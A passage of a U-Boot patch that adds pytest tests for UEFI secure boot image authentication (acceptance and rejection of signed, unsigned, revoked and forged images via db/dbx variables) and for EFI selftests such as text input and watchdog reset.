add -b 1 HELLO1 host 0:1 /helloworld.efi.signed -s ""', + 'efidebug boot order 1', + 'efidebug test bootmgr']) + assert('\'HELLO1\' failed' in ''.join(output)) + assert('efi_start_image() returned: 26' in ''.join(output)) + output = u_boot_console.run_command_list([ + 'efidebug boot add -b 2 HELLO2 host 0:1 /helloworld.efi -s ""', + 'efidebug boot order 2', + 'efidebug test bootmgr']) + assert '\'HELLO2\' failed' in ''.join(output) + assert 'efi_start_image() returned: 26' in ''.join(output) + + with u_boot_console.log.section('Test Case 2b'): + # Test Case 2b, authenticated by db + output = u_boot_console.run_command_list([ + 'fatload host 0:1 4000000 db.auth', + 'setenv -e -nv -bs -rt -at -i 4000000:$filesize db']) + assert 'Failed to set EFI variable' not in ''.join(output) + output = u_boot_console.run_command_list([ + 'efidebug boot order 2', + 'efidebug test bootmgr']) + assert '\'HELLO2\' failed' in ''.join(output) + assert 'efi_start_image() returned: 26' in ''.join(output) + output = u_boot_console.run_command_list([ + 'efidebug boot order 1', + 'bootefi bootmgr']) + assert 'Hello, world!' in ''.join(output) + + def test_efi_signed_image_auth3(self, u_boot_console, efi_boot_env): + """ + Test Case 3 - rejected by dbx (TEST_db certificate in dbx) + """ + u_boot_console.restart_uboot() + disk_img = efi_boot_env + with u_boot_console.log.section('Test Case 3a'): + # Test Case 3a, rejected by dbx + output = u_boot_console.run_command_list([ + 'host bind 0 %s' % disk_img, + 'fatload host 0:1 4000000 db.auth', + 'setenv -e -nv -bs -rt -at -i 4000000:$filesize dbx', + 'fatload host 0:1 4000000 KEK.auth', + 'setenv -e -nv -bs -rt -at -i 4000000:$filesize KEK', + 'fatload host 0:1 4000000 PK.auth', + 'setenv -e -nv -bs -rt -at -i 4000000:$filesize PK']) + assert 'Failed to set EFI variable' not in ''.join(output) + output = u_boot_console.run_command_list([ + 'efidebug boot add -b 1 HELLO host 0:1 /helloworld.efi.signed -s ""', + 'efidebug boot order 1', + 'efidebug test bootmgr']) + assert '\'HELLO\' failed' in ''.join(output) + assert 'efi_start_image() returned: 26' in ''.join(output) + + with u_boot_console.log.section('Test Case 3b'): + # Test Case 3b, rejected by dbx even if db allows + output = u_boot_console.run_command_list([ + 'fatload host 0:1 4000000 db.auth', + 'setenv -e -nv -bs -rt -at -i 4000000:$filesize db']) + assert 'Failed to set EFI variable' not in ''.join(output) + output = u_boot_console.run_command_list([ + 'efidebug boot order 1', + 'efidebug test bootmgr']) + assert '\'HELLO\' failed' in ''.join(output) + assert 'efi_start_image() returned: 26' in ''.join(output) + + def test_efi_signed_image_auth4(self, u_boot_console, efi_boot_env): + """ + Test Case 4 - revoked by dbx (digest of TEST_db certificate in dbx) + """ + u_boot_console.restart_uboot() + disk_img = efi_boot_env + with u_boot_console.log.section('Test Case 4'): + # Test Case 4, rejected by dbx + output = u_boot_console.run_command_list([ + 'host bind 0 %s' % disk_img, + 'fatload host 0:1 4000000 dbx_hash.auth', + 'setenv -e -nv -bs -rt -at -i 4000000:$filesize dbx', + 'fatload host 0:1 4000000 db.auth', + 'setenv -e -nv -bs -rt -at -i 4000000:$filesize db', + 'fatload host 0:1 4000000 KEK.auth', + 'setenv -e -nv -bs -rt -at -i 4000000:$filesize KEK', + 'fatload host 0:1 4000000 PK.auth', + 'setenv -e -nv -bs -rt -at -i 4000000:$filesize PK']) + assert 'Failed to set EFI variable' not in ''.join(output) + output = u_boot_console.run_command_list([ + 'efidebug boot add -b 1 HELLO host 0:1 /helloworld.efi.signed -s ""', + 'efidebug boot order 1', + 'efidebug test bootmgr']) + assert '\'HELLO\' failed' in ''.join(output) + assert 'efi_start_image() returned: 26' in ''.join(output) + + def test_efi_signed_image_auth5(self, u_boot_console, efi_boot_env): + """ + Test Case 5 - multiple signatures + one signed with TEST_db, and + one signed with TEST_db1 + """ + u_boot_console.restart_uboot() + disk_img = efi_boot_env + with u_boot_console.log.section('Test Case 5a'): + # Test Case 5a, authenticated even if only one of signatures + # is verified + output = u_boot_console.run_command_list([ + 'host bind 0 %s' % disk_img, + 'fatload host 0:1 4000000 db.auth', + 'setenv -e -nv -bs -rt -at -i 4000000:$filesize db', + 'fatload host 0:1 4000000 KEK.auth', + 'setenv -e -nv -bs -rt -at -i 4000000:$filesize KEK', + 'fatload host 0:1 4000000 PK.auth', + 'setenv -e -nv -bs -rt -at -i 4000000:$filesize PK']) + assert 'Failed to set EFI variable' not in ''.join(output) + output = u_boot_console.run_command_list([ + 'efidebug boot add -b 1 HELLO host 0:1 /helloworld.efi.signed_2sigs -s ""', + 'efidebug boot order 1', + 'efidebug test bootmgr']) + assert 'Hello, world!' in ''.join(output) + + with u_boot_console.log.section('Test Case 5b'): + # Test Case 5b, authenticated if both signatures are verified + output = u_boot_console.run_command_list([ + 'fatload host 0:1 4000000 db1.auth', + 'setenv -e -nv -bs -rt -at -a -i 4000000:$filesize db']) + assert 'Failed to set EFI variable' not in ''.join(output) + output = u_boot_console.run_command_list([ + 'efidebug boot order 1', + 'efidebug test bootmgr']) + assert 'Hello, world!' in ''.join(output) + + with u_boot_console.log.section('Test Case 5c'): + # Test Case 5c, rejected if one of signatures (digest of + # certificate) is revoked + output = u_boot_console.run_command_list([ + 'fatload host 0:1 4000000 dbx_hash.auth', + 'setenv -e -nv -bs -rt -at -i 4000000:$filesize dbx']) + assert 'Failed to set EFI variable' not in ''.join(output) + output = u_boot_console.run_command_list([ + 'efidebug boot order 1', + 'efidebug test bootmgr']) + assert '\'HELLO\' failed' in ''.join(output) + assert 'efi_start_image() returned: 26' in ''.join(output) + + with u_boot_console.log.section('Test Case 5d'): + # Test Case 5d, rejected if both of signatures are revoked + output = u_boot_console.run_command_list([ + 'fatload host 0:1 4000000 dbx_hash1.auth', + 'setenv -e -nv -bs -rt -at -a -i 4000000:$filesize dbx']) + assert 'Failed to set EFI variable' not in ''.join(output) + output = u_boot_console.run_command_list([ + 'efidebug boot order 1', + 'efidebug test bootmgr']) + assert '\'HELLO\' failed' in ''.join(output) + assert 'efi_start_image() returned: 26' in ''.join(output) + + # Try rejection in reverse order. + u_boot_console.restart_uboot() + with u_boot_console.log.section('Test Case 5e'): + # Test Case 5e, authenticated even if only one of signatures + # is verified. Same as before but reject dbx_hash1.auth only + output = u_boot_console.run_command_list([ + 'host bind 0 %s' % disk_img, + 'fatload host 0:1 4000000 db.auth', + 'setenv -e -nv -bs -rt -at -i 4000000:$filesize db', + 'fatload host 0:1 4000000 KEK.auth', + 'setenv -e -nv -bs -rt -at -i 4000000:$filesize KEK', + 'fatload host 0:1 4000000 PK.auth', + 'setenv -e -nv -bs -rt -at -i 4000000:$filesize PK', + 'fatload host 0:1 4000000 db1.auth', + 'setenv -e -nv -bs -rt -at -a -i 4000000:$filesize db', + 'fatload host 0:1 4000000 dbx_hash1.auth', + 'setenv -e -nv -bs -rt -at -i 4000000:$filesize dbx']) + assert 'Failed to set EFI variable' not in ''.join(output) + output = u_boot_console.run_command_list([ + 'efidebug boot add -b 1 HELLO host 0:1 /helloworld.efi.signed_2sigs -s ""', + 'efidebug boot order 1', + 'efidebug test bootmgr']) + assert '\'HELLO\' failed' in ''.join(output) + assert 'efi_start_image() returned: 26' in ''.join(output) + + def test_efi_signed_image_auth6(self, u_boot_console, efi_boot_env): + """ + Test Case 6 - using digest of signed image in database + """ + u_boot_console.restart_uboot() + disk_img = efi_boot_env + with u_boot_console.log.section('Test Case 6a'): + # Test Case 6a, verified by image's digest in db + output = u_boot_console.run_command_list([ + 'host bind 0 %s' % disk_img, + 'fatload host 0:1 4000000 db_hello_signed.auth', + 'setenv -e -nv -bs -rt -at -i 4000000:$filesize db', + 'fatload host 0:1 4000000 KEK.auth', + 'setenv -e -nv -bs -rt -at -i 4000000:$filesize KEK', + 'fatload host 0:1 4000000 PK.auth', + 'setenv -e -nv -bs -rt -at -i 4000000:$filesize PK']) + assert 'Failed to set EFI variable' not in ''.join(output) + output = u_boot_console.run_command_list([ + 'efidebug boot add -b 1 HELLO host 0:1 /helloworld.efi.signed -s ""', + 'efidebug boot order 1', + 'bootefi bootmgr']) + assert 'Hello, world!' in ''.join(output) + + with u_boot_console.log.section('Test Case 6b'): + # Test Case 6b, rejected by TEST_db certificate in dbx + output = u_boot_console.run_command_list([ + 'fatload host 0:1 4000000 dbx_db.auth', + 'setenv -e -nv -bs -rt -at -i 4000000:$filesize dbx']) + assert 'Failed to set EFI variable' not in ''.join(output) + output = u_boot_console.run_command_list([ + 'efidebug boot order 1', + 'efidebug test bootmgr']) + assert '\'HELLO\' failed' in ''.join(output) + assert 'efi_start_image() returned: 26' in ''.join(output) + + with u_boot_console.log.section('Test Case 6c'): + # Test Case 6c, rejected by image's digest in dbx + output = u_boot_console.run_command_list([ + 'fatload host 0:1 4000000 db.auth', + 'setenv -e -nv -bs -rt -at -i 4000000:$filesize db', + 'fatload host 0:1 4000000 dbx_hello_signed.auth', + 'setenv -e -nv -bs -rt -at -i 4000000:$filesize dbx']) + assert 'Failed to set EFI variable' not in ''.join(output) + output = u_boot_console.run_command_list([ + 'efidebug boot order 1', + 'efidebug test bootmgr']) + assert '\'HELLO\' failed' in ''.join(output) + assert 'efi_start_image() returned: 26' in ''.join(output) + + def test_efi_signed_image_auth7(self, u_boot_console, efi_boot_env): + """ + Test Case 7 - Reject images based on the sha384/512 of their x509 cert + """ + # sha384 of an x509 cert in dbx + u_boot_console.restart_uboot() + disk_img = efi_boot_env + with u_boot_console.log.section('Test Case 7a'): + output = u_boot_console.run_command_list([ + 'host bind 0 %s' % disk_img, + 'fatload host 0:1 4000000 db.auth', + 'setenv -e -nv -bs -rt -at -i 4000000:$filesize db', + 'fatload host 0:1 4000000 KEK.auth', + 'setenv -e -nv -bs -rt -at -i 4000000:$filesize KEK', + 'fatload host 0:1 4000000 PK.auth', + 'setenv -e -nv -bs -rt -at -i 4000000:$filesize PK', + 'fatload host 0:1 4000000 db1.auth', + 'setenv -e -nv -bs -rt -at -a -i 4000000:$filesize db', + 'fatload host 0:1 4000000 dbx_hash384.auth', + 'setenv -e -nv -bs -rt -at -i 4000000:$filesize dbx']) + assert 'Failed to set EFI variable' not in ''.join(output) + output = u_boot_console.run_command_list([ + 'efidebug boot add -b 1 HELLO host 0:1 /helloworld.efi.signed_2sigs -s ""', + 'efidebug boot order 1', + 'efidebug test bootmgr']) + assert '\'HELLO\' failed' in ''.join(output) + assert 'efi_start_image() returned: 26' in ''.join(output) + + # sha512 of an x509 cert in dbx + u_boot_console.restart_uboot() + with u_boot_console.log.section('Test Case 7b'): + output = u_boot_console.run_command_list([ + 'host bind 0 %s' % disk_img, + 'fatload host 0:1 4000000 db.auth', + 'setenv -e -nv -bs -rt -at -i 4000000:$filesize db', + 'fatload host 0:1 4000000 KEK.auth', + 'setenv -e -nv -bs -rt -at -i 4000000:$filesize KEK', + 'fatload host 0:1 4000000 PK.auth', + 'setenv -e -nv -bs -rt -at -i 4000000:$filesize PK', + 'fatload host 0:1 4000000 db1.auth', + 'setenv -e -nv -bs -rt -at -a -i 4000000:$filesize db', + 'fatload host 0:1 4000000 dbx_hash512.auth', + 'setenv -e -nv -bs -rt -at -i 4000000:$filesize dbx']) + assert 'Failed to set EFI variable' not in ''.join(output) + output = u_boot_console.run_command_list([ + 'efidebug boot add -b 1 HELLO host 0:1 /helloworld.efi.signed_2sigs -s ""', + 'efidebug boot order 1', + 'efidebug test bootmgr']) + assert '\'HELLO\' failed' in ''.join(output) + assert 'efi_start_image() returned: 26' in ''.join(output) + + def test_efi_signed_image_auth8(self, u_boot_console, efi_boot_env): + """ + Test Case 8 - Secure boot is in force, + Same as Test Case 2 but the image binary to be loaded + was willfully modified (forged) + Must be rejected. + """ + u_boot_console.restart_uboot() + disk_img = efi_boot_env + with u_boot_console.log.section('Test Case 8a'): + # Test Case 8a, Secure boot is not yet forced + output = u_boot_console.run_command_list([ + 'host bind 0 %s' % disk_img, + 'efidebug boot add -b 1 HELLO1 host 0:1 /helloworld_forged.efi.signed -s ""', + 'efidebug boot order 1', + 'efidebug test bootmgr']) + assert('hELLO, world!' in ''.join(output)) + + with u_boot_console.log.section('Test Case 8b'): + # Test Case 8b, Install signature database and verify the image + output = u_boot_console.run_command_list([ + 'fatload host 0:1 4000000 db.auth', + 'setenv -e -nv -bs -rt -at -i 4000000:$filesize db', + 'fatload host 0:1 4000000 KEK.auth', + 'setenv -e -nv -bs -rt -at -i 4000000:$filesize KEK', + 'fatload host 0:1 4000000 PK.auth', + 'setenv -e -nv -bs -rt -at -i 4000000:$filesize PK']) + assert 'Failed to set EFI variable' not in ''.join(output) + output = u_boot_console.run_command_list([ + 'efidebug boot order 1', + 'efidebug test bootmgr']) + assert(not 'hELLO, world!' in ''.join(output)) + assert('\'HELLO1\' failed' in ''.join(output)) + assert('efi_start_image() returned: 26' in ''.join(output)) diff --git a/test/py/tests/test_efi_secboot/test_signed_intca.py b/test/py/tests/test_efi_secboot/test_signed_intca.py new file mode 100644 index 00000000000..8d9a5f3e7fe --- /dev/null +++ b/test/py/tests/test_efi_secboot/test_signed_intca.py @@ -0,0 +1,135 @@ +# SPDX-License-Identifier: GPL-2.0+ +# Copyright (c) 2020, Linaro Limited +# Author: AKASHI Takahiro <takahiro.akashi@linaro.org> +# +# U-Boot UEFI: Image Authentication Test (signature with certificates chain) + +""" +This test verifies image authentication for a signed image which is signed +by user certificate and contains additional intermediate certificates in its +signature. +""" + +import pytest + + +@pytest.mark.boardspec('sandbox') +@pytest.mark.buildconfigspec('efi_secure_boot') +@pytest.mark.buildconfigspec('cmd_efidebug') +@pytest.mark.buildconfigspec('cmd_fat') +@pytest.mark.buildconfigspec('cmd_nvedit_efi') +@pytest.mark.slow +class TestEfiSignedImageIntca(object): + def test_efi_signed_image_intca1(self, u_boot_console, efi_boot_env_intca): + """ + Test Case 1 - authenticated by root CA in db + """ + u_boot_console.restart_uboot() + disk_img = efi_boot_env_intca + with u_boot_console.log.section('Test Case 1a'): + # Test Case 1a, with no Int CA and not authenticated by root CA + output = u_boot_console.run_command_list([ + 'host bind 0 %s' % disk_img, + 'fatload host 0:1 4000000 db_c.auth', + 'setenv -e -nv -bs -rt -at -i 4000000:$filesize db', + 'fatload host 0:1 4000000 KEK.auth', + 'setenv -e -nv -bs -rt -at -i 4000000:$filesize KEK', + 'fatload host 0:1 4000000 PK.auth', + 'setenv -e -nv -bs -rt -at -i 4000000:$filesize PK']) + assert 'Failed to set EFI variable' not in ''.join(output) + + output = u_boot_console.run_command_list([ + 'efidebug boot add -b 1 HELLO_a host 0:1 /helloworld.efi.signed_a -s ""', + 'efidebug boot order 1', + 'efidebug test bootmgr']) + assert '\'HELLO_a\' failed' in ''.join(output) + assert 'efi_start_image() returned: 26' in ''.join(output) + + with u_boot_console.log.section('Test Case 1b'): + # Test Case 1b, signed and authenticated by root CA + output = u_boot_console.run_command_list([ + 'efidebug boot add -b 2 HELLO_ab host 0:1 /helloworld.efi.signed_ab -s ""', + 'efidebug boot order 2', + 'bootefi bootmgr']) + assert 'Hello, world!' in ''.join(output) + + def test_efi_signed_image_intca2(self, u_boot_console, efi_boot_env_intca): + """ + Test Case 2 - authenticated by root CA in db + """ + u_boot_console.restart_uboot() + disk_img = efi_boot_env_intca + with u_boot_console.log.section('Test Case 2a'): + # Test Case 2a, unsigned and not authenticated by root CA + output = u_boot_console.run_command_list([ + 'host bind 0 %s' % disk_img, + 'fatload host 0:1 4000000 KEK.auth', + 'setenv -e -nv -bs -rt -at -i 4000000:$filesize KEK', + 'fatload host 0:1 4000000 PK.auth', + 'setenv -e -nv -bs -rt -at -i 4000000:$filesize PK']) + assert 'Failed to set EFI variable' not in ''.join(output) + + output = u_boot_console.run_command_list([ + 'efidebug boot add -b 1 HELLO_abc host 0:1 /helloworld.efi.signed_abc -s ""', + 'efidebug boot order 1', + 'efidebug test bootmgr']) + assert '\'HELLO_abc\' failed' in ''.join(output) + assert 'efi_start_image() returned: 26' in ''.join(output) + + with u_boot_console.log.section('Test Case 2b'): + # Test Case 2b, signed and authenticated by root CA + output = u_boot_console.run_command_list([ + 'fatload host 0:1 4000000 db_b.auth', + 'setenv -e -nv -bs -rt -at -i 4000000:$filesize db', + 'efidebug boot order 1', + 'efidebug test bootmgr']) + assert '\'HELLO_abc\' failed' in ''.join(output) + assert 'efi_start_image() returned: 26' in ''.join(output) + + with u_boot_console.log.section('Test Case 2c'): + # Test Case 2c, signed and authenticated by root CA + output = u_boot_console.run_command_list([ + 'fatload host 0:1 4000000 db_c.auth', + 'setenv -e -nv -bs -rt -at -i 4000000:$filesize db', + 'efidebug boot order 1', + 'efidebug test bootmgr']) + assert 'Hello, world!' in ''.join(output) + + def test_efi_signed_image_intca3(self, u_boot_console, efi_boot_env_intca): + """ + Test Case 3 - revoked by dbx + """ + u_boot_console.restart_uboot() + disk_img = efi_boot_env_intca + with u_boot_console.log.section('Test Case 3a'): + # Test Case 3a, revoked by int CA in dbx + output = u_boot_console.run_command_list([ + 'host bind 0 %s' % disk_img, + 'fatload host 0:1 4000000 dbx_b.auth', + 'setenv -e -nv -bs -rt -at -i 4000000:$filesize dbx', + 'fatload host 0:1 4000000 db_c.auth', + 'setenv -e -nv -bs -rt -at -i 4000000:$filesize db', + 'fatload host 0:1 4000000 KEK.auth', + 'setenv -e -nv -bs -rt -at -i 4000000:$filesize KEK', + 'fatload host 0:1 4000000 PK.auth', + 'setenv -e -nv -bs -rt -at -i 4000000:$filesize PK']) + assert 'Failed to set EFI variable' not in ''.join(output) + + output = u_boot_console.run_command_list([ + 'efidebug boot add -b 1 HELLO_abc host 0:1 /helloworld.efi.signed_abc -s ""', + 'efidebug boot order 1', + 'efidebug test bootmgr']) + assert 'Hello, world!' in ''.join(output) + # Or, + # assert '\'HELLO_abc\' failed' in ''.join(output) + # assert 'efi_start_image() returned: 26' in ''.join(output) + + with u_boot_console.log.section('Test Case 3b'): + # Test Case 3b, revoked by root CA in dbx + output = u_boot_console.run_command_list([ + 'fatload host 0:1 4000000 dbx_c.auth', + 'setenv -e -nv -bs -rt -at -i 4000000:$filesize dbx', + 'efidebug boot order 1', + 'efidebug test bootmgr']) + assert '\'HELLO_abc\' failed' in ''.join(output) + assert 'efi_start_image() returned: 26' in ''.join(output) diff --git a/test/py/tests/test_efi_secboot/test_unsigned.py b/test/py/tests/test_efi_secboot/test_unsigned.py new file mode 100644 index 00000000000..7c078f220d0 --- /dev/null +++ b/test/py/tests/test_efi_secboot/test_unsigned.py @@ -0,0 +1,117 @@ +# SPDX-License-Identifier: GPL-2.0+ +# Copyright (c) 2019, Linaro Limited +# Author: AKASHI Takahiro <takahiro.akashi@linaro.org> +# +# U-Boot UEFI: Signed Image Authentication Test + +""" +This test verifies image authentication for unsigned images. +""" + +import pytest + + +@pytest.mark.boardspec('sandbox') +@pytest.mark.buildconfigspec('efi_secure_boot') +@pytest.mark.buildconfigspec('cmd_efidebug') +@pytest.mark.buildconfigspec('cmd_fat') +@pytest.mark.buildconfigspec('cmd_nvedit_efi') +@pytest.mark.slow +class TestEfiUnsignedImage(object): + def test_efi_unsigned_image_auth1(self, u_boot_console, efi_boot_env): + """ + Test Case 1 - rejected when not digest in db or dbx + """ + u_boot_console.restart_uboot() + disk_img = efi_boot_env + with u_boot_console.log.section('Test Case 1'): + # Test Case 1 + output = u_boot_console.run_command_list([ + 'host bind 0 %s' % disk_img, + 'fatload host 0:1 4000000 KEK.auth', + 'setenv -e -nv -bs -rt -at -i 4000000:$filesize KEK', + 'fatload host 0:1 4000000 PK.auth', + 'setenv -e -nv -bs -rt -at -i 4000000:$filesize PK']) + assert 'Failed to set EFI variable' not in ''.join(output) + + output = u_boot_console.run_command_list([ + 'efidebug boot add -b 1 HELLO host 0:1 /helloworld.efi -s ""', + 'efidebug boot order 1', + 'bootefi bootmgr']) + assert '\'HELLO\' failed' in ''.join(output) + output = u_boot_console.run_command_list([ + 'efidebug boot order 1', + 'efidebug test bootmgr']) + assert 'efi_start_image() returned: 26' in ''.join(output) + assert 'Hello, world!' not in ''.join(output) + + def test_efi_unsigned_image_auth2(self, u_boot_console, efi_boot_env): + """ + Test Case 2 - authenticated by digest in db + """ + u_boot_console.restart_uboot() + disk_img = efi_boot_env + with u_boot_console.log.section('Test Case 2'): + # Test Case 2 + output = u_boot_console.run_command_list([ + 'host bind 0 %s' % disk_img, + 'fatload host 0:1 4000000 db_hello.auth', + 'setenv -e -nv -bs -rt -at -i 4000000:$filesize db', + 'fatload host 0:1 4000000 KEK.auth', + 'setenv -e -nv -bs -rt -at -i 4000000:$filesize KEK', + 'fatload host 0:1 4000000 PK.auth', + 'setenv -e -nv -bs -rt -at -i 4000000:$filesize PK']) + assert 'Failed to set EFI variable' not in ''.join(output) + + output = u_boot_console.run_command_list([ + 'efidebug boot add -b 1 HELLO host 0:1 /helloworld.efi -s ""', + 'efidebug boot order 1', + 'bootefi bootmgr']) + assert 'Hello, world!' in ''.join(output) + + def test_efi_unsigned_image_auth3(self, u_boot_console, efi_boot_env): + """ + Test Case 3 - rejected by digest in dbx + """ + u_boot_console.restart_uboot() + disk_img = efi_boot_env + with u_boot_console.log.section('Test Case 3a'): + # Test Case 3a, rejected by dbx + output = u_boot_console.run_command_list([ + 'host bind 0 %s' % disk_img, + 'fatload host 0:1 4000000 db_hello.auth', + 'setenv -e -nv -bs -rt -at -i 4000000:$filesize dbx', + 'fatload host 0:1 4000000 KEK.auth', + 'setenv -e -nv -bs -rt -at -i 4000000:$filesize KEK', + 'fatload host 0:1 4000000 PK.auth', + 'setenv -e -nv -bs -rt -at -i 4000000:$filesize PK']) + assert 'Failed to set EFI variable' not in ''.join(output) + + output = u_boot_console.run_command_list([ + 'efidebug boot add -b 1 HELLO host 0:1 /helloworld.efi -s ""', + 'efidebug boot order 1', + 'bootefi bootmgr']) + assert '\'HELLO\' failed' in ''.join(output) + output = u_boot_console.run_command_list([ + 'efidebug boot order 1', + 'efidebug test bootmgr']) + assert 'efi_start_image() returned: 26' in ''.join(output) + assert 'Hello, world!' not in ''.join(output) + + with u_boot_console.log.section('Test Case 3b'): + # Test Case 3b, rejected by dbx even if db allows + output = u_boot_console.run_command_list([ + 'fatload host 0:1 4000000 db_hello.auth', + 'setenv -e -nv -bs -rt -at -i 4000000:$filesize db']) + assert 'Failed to set EFI variable' not in ''.join(output) + + output = u_boot_console.run_command_list([ + 'efidebug boot add -b 1 HELLO host 0:1 /helloworld.efi -s ""', + 'efidebug boot order 1', + 'bootefi bootmgr']) + assert '\'HELLO\' failed' in ''.join(output) + output = u_boot_console.run_command_list([ + 'efidebug boot order 1', + 'efidebug test bootmgr']) + assert 'efi_start_image() returned: 26' in ''.join(output) + assert 'Hello, world!' not in ''.join(output) diff --git a/test/py/tests/test_efi_selftest.py b/test/py/tests/test_efi_selftest.py new file mode 100644 index 00000000000..43f24245582 --- /dev/null +++ b/test/py/tests/test_efi_selftest.py @@ -0,0 +1,197 @@ +# SPDX-License-Identifier: GPL-2.0 +# Copyright (c) 2017, Heinrich Schuchardt <xypron.glpk@gmx.de> + +""" Test UEFI API implementation +""" + +import pytest + +@pytest.mark.buildconfigspec('cmd_bootefi_selftest') +def test_efi_selftest_base(u_boot_console): + """Run UEFI unit tests + + u_boot_console -- U-Boot console + + This function executes all selftests that are not marked as on request. + """ + u_boot_console.run_command(cmd='setenv efi_selftest') + u_boot_console.run_command(cmd='bootefi selftest', wait_for_prompt=False) + if u_boot_console.p.expect(['Summary: 0 failures', 'Press any key']): + raise Exception('Failures occurred during the EFI selftest') + u_boot_console.restart_uboot() + +@pytest.mark.buildconfigspec('cmd_bootefi_selftest') +@pytest.mark.buildconfigspec('hush_parser') +@pytest.mark.buildconfigspec('of_control') +@pytest.mark.notbuildconfigspec('generate_acpi_table') +def test_efi_selftest_device_tree(u_boot_console): + """Test the device tree support in the UEFI sub-system + + u_boot_console -- U-Boot console + + This test executes the UEFI unit test by calling 'bootefi selftest'. + """ + u_boot_console.run_command(cmd='setenv efi_selftest list') + output = u_boot_console.run_command('bootefi selftest') + assert '\'device tree\'' in output + u_boot_console.run_command(cmd='setenv efi_selftest device tree') + # Set serial# if it is not already set. + u_boot_console.run_command(cmd='setenv efi_test "${serial#}x"') + u_boot_console.run_command(cmd='test "${efi_test}" = x && setenv serial# 0') + u_boot_console.run_command(cmd='bootefi selftest ${fdtcontroladdr}', wait_for_prompt=False) + if u_boot_console.p.expect(['serial-number:', 'U-Boot']): + raise Exception('serial-number missing in device tree') + u_boot_console.restart_uboot() + +@pytest.mark.buildconfigspec('cmd_bootefi_selftest') +def test_efi_selftest_watchdog_reboot(u_boot_console): + """Test the watchdog timer + + u_boot_console -- U-Boot console + + This function executes the 'watchdog reboot' unit test. + """ + u_boot_console.run_command(cmd='setenv efi_selftest list') + output = u_boot_console.run_command('bootefi selftest') + assert '\'watchdog reboot\'' in output + u_boot_console.run_command(cmd='setenv efi_selftest watchdog reboot') + u_boot_console.run_command(cmd='bootefi selftest', wait_for_prompt=False) + if u_boot_console.p.expect(['resetting', 'U-Boot']): + raise Exception('Reset failed in \'watchdog reboot\' test') + u_boot_console.restart_uboot() + +@pytest.mark.buildconfigspec('cmd_bootefi_selftest') +def test_efi_selftest_text_input(u_boot_console): + """Test the EFI_SIMPLE_TEXT_INPUT_PROTOCOL + + u_boot_console -- U-Boot console + + This function calls the text input EFI selftest. + """ + u_boot_console.run_command(cmd='setenv efi_selftest text input') + u_boot_console.run_command(cmd='bootefi selftest', wait_for_prompt=False) + if u_boot_console.p.expect([r'To terminate type \'x\'']): + raise Exception('No prompt for \'text input\' test') + u_boot_console.drain_console() + # EOT + u_boot_console.run_command(cmd=chr(4), wait_for_echo=False, + send_nl=False, wait_for_prompt=False) + if u_boot_console.p.expect([r'Unicode char 4 \(unknown\), scan code 0 \(Null\)']): + raise Exception('EOT failed in \'text input\' test') + u_boot_console.drain_console() + # BS + u_boot_console.run_command(cmd=chr(8), wait_for_echo=False, + send_nl=False, wait_for_prompt=False) + if u_boot_console.p.expect([r'Unicode char 8 \(BS\), scan code 0 \(Null\)']): + raise Exception('BS failed in \'text input\' test') + u_boot_console.drain_console() + # TAB + u_boot_console.run_command(cmd=chr(9), wait_for_echo=False, + send_nl=False, wait_for_prompt=False) + if u_boot_console.p.expect([r'Unicode char 9 \(TAB\), scan code 0 \(Null\)']): + raise Exception('BS failed in \'text input\' test') + u_boot_console.drain_console() + # a + u_boot_console.run_command(cmd='a', wait_for_echo=False, send_nl=False, + wait_for_prompt=False) + if u_boot_console.p.expect([r'Unicode char 97 \(\'a\'\), scan code 0 \(Null\)']): + raise Exception('\'a\' failed in \'text input\' test') + u_boot_console.drain_console() + # UP escape sequence + u_boot_console.run_command(cmd=chr(27) + '[A', wait_for_echo=False, + send_nl=False, wait_for_prompt=False) + if u_boot_console.p.expect([r'Unicode char 0 \(Null\), scan code 1 \(Up\)']): + raise Exception('UP failed in \'text input\' test') + u_boot_console.drain_console() + # Euro sign + u_boot_console.run_command(cmd=b'\xe2\x82\xac'.decode(), wait_for_echo=False, + send_nl=False, wait_for_prompt=False) + if u_boot_console.p.expect([r'Unicode char 8364 \(\'']): + raise Exception('Euro sign failed in \'text input\' test') + u_boot_console.drain_console() + u_boot_console.run_command(cmd='x', wait_for_echo=False, send_nl=False, + wait_for_prompt=False) + if u_boot_console.p.expect(['Summary: 0 failures', 'Press any key']): + raise Exception('Failures occurred during the EFI selftest') + u_boot_console.restart_uboot() + +@pytest.mark.buildconfigspec('cmd_bootefi_selftest') +def test_efi_selftest_text_input_ex(u_boot_console): + """Test the EFI_SIMPLE_TEXT_INPUT_EX_PROTOCOL + + u_boot_console -- U-Boot console + + This function calls the extended text input EFI selftest. + """ + u_boot_console.run_command(cmd='setenv efi_selftest extended text input') + u_boot_console.run_command(cmd='bootefi selftest', wait_for_prompt=False) + if u_boot_console.p.expect([r'To terminate type \'CTRL\+x\'']): + raise Exception('No prompt for \'text input\' test') + u_boot_console.drain_console() + # EOT + u_boot_console.run_command(cmd=chr(4), wait_for_echo=False, + send_nl=False, wait_for_prompt=False) + if u_boot_console.p.expect([r'Unicode char 100 \(\'d\'\), scan code 0 \(CTRL\+Null\)']): + raise Exception('EOT failed in \'text input\' test') + u_boot_console.drain_console() + # BS + u_boot_console.run_command(cmd=chr(8), wait_for_echo=False, + send_nl=False, wait_for_prompt=False) + if u_boot_console.p.expect([r'Unicode char 8 \(BS\), scan code 0 \(\+Null\)']): + raise Exception('BS failed in \'text input\' test') + u_boot_console.drain_console() + # TAB + u_boot_console.run_command(cmd=chr(9), wait_for_echo=False, + send_nl=False, wait_for_prompt=False) + if u_boot_console.p.expect([r'Unicode char 9 \(TAB\), scan code 0 \(\+Null\)']): + raise Exception('TAB failed in \'text input\' test') + u_boot_console.drain_console() + # a + u_boot_console.run_command(cmd='a', wait_for_echo=False, send_nl=False, + wait_for_prompt=False) + if u_boot_console.p.expect([r'Unicode char 97 \(\'a\'\), scan code 0 \(Null\)']): + raise Exception('\'a\' failed in \'text input\' test') + u_boot_console.drain_console() + # UP escape sequence + u_boot_console.run_command(cmd=chr(27) + '[A', wait_for_echo=False, + send_nl=False, wait_for_prompt=False) + if u_boot_console.p.expect([r'Unicode char 0 \(Null\), scan code 1 \(\+Up\)']): + raise Exception('UP failed in \'text input\' test') + u_boot_console.drain_console() + # Euro sign + u_boot_console.run_command(cmd=b'\xe2\x82\xac'.decode(), wait_for_echo=False, + send_nl=False, wait_for_prompt=False) + if u_boot_console.p.expect([r'Unicode char 8364 \(\'']): + raise Exception('Euro sign failed in \'text input\' test') + u_boot_console.drain_console() + # SHIFT+ALT+FN 5 + u_boot_console.run_command(cmd=b'\x1b\x5b\x31\x35\x3b\x34\x7e'.decode(), + wait_for_echo=False, send_nl=False, + 